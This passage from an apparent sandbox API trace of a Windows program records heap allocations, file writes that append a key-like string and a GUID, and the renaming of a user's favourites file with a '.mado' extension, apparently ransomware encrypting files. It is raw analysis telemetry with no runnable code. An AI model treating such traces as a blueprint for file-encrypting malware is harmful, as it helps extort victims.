Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe850 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.413] GetCurrentThreadId () returned 0x600 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b690c8 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.413] GetCurrentThreadId () returned 0x600 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe838 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe850 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe820 [0205.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe898 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe868 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe838 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8b0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe868 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe898 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe850 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe820 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe808 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66228 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.417] WriteFile (in: hFile=0x63c, lpBuffer=0x2eee30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2eee30*, lpNumberOfBytesWritten=0x39cfb14*=0x80, lpOverlapped=0x0) returned 1 [0205.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.417] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.417] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.419] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.419] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.419] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.420] CloseHandle (hObject=0x63c) returned 1 [0205.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.420] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.mado")) returned 1 [0205.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.421] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b3348 | out: hHeap=0x2c0000) returned 1 [0205.422] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0205.422] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0205.422] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.422] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 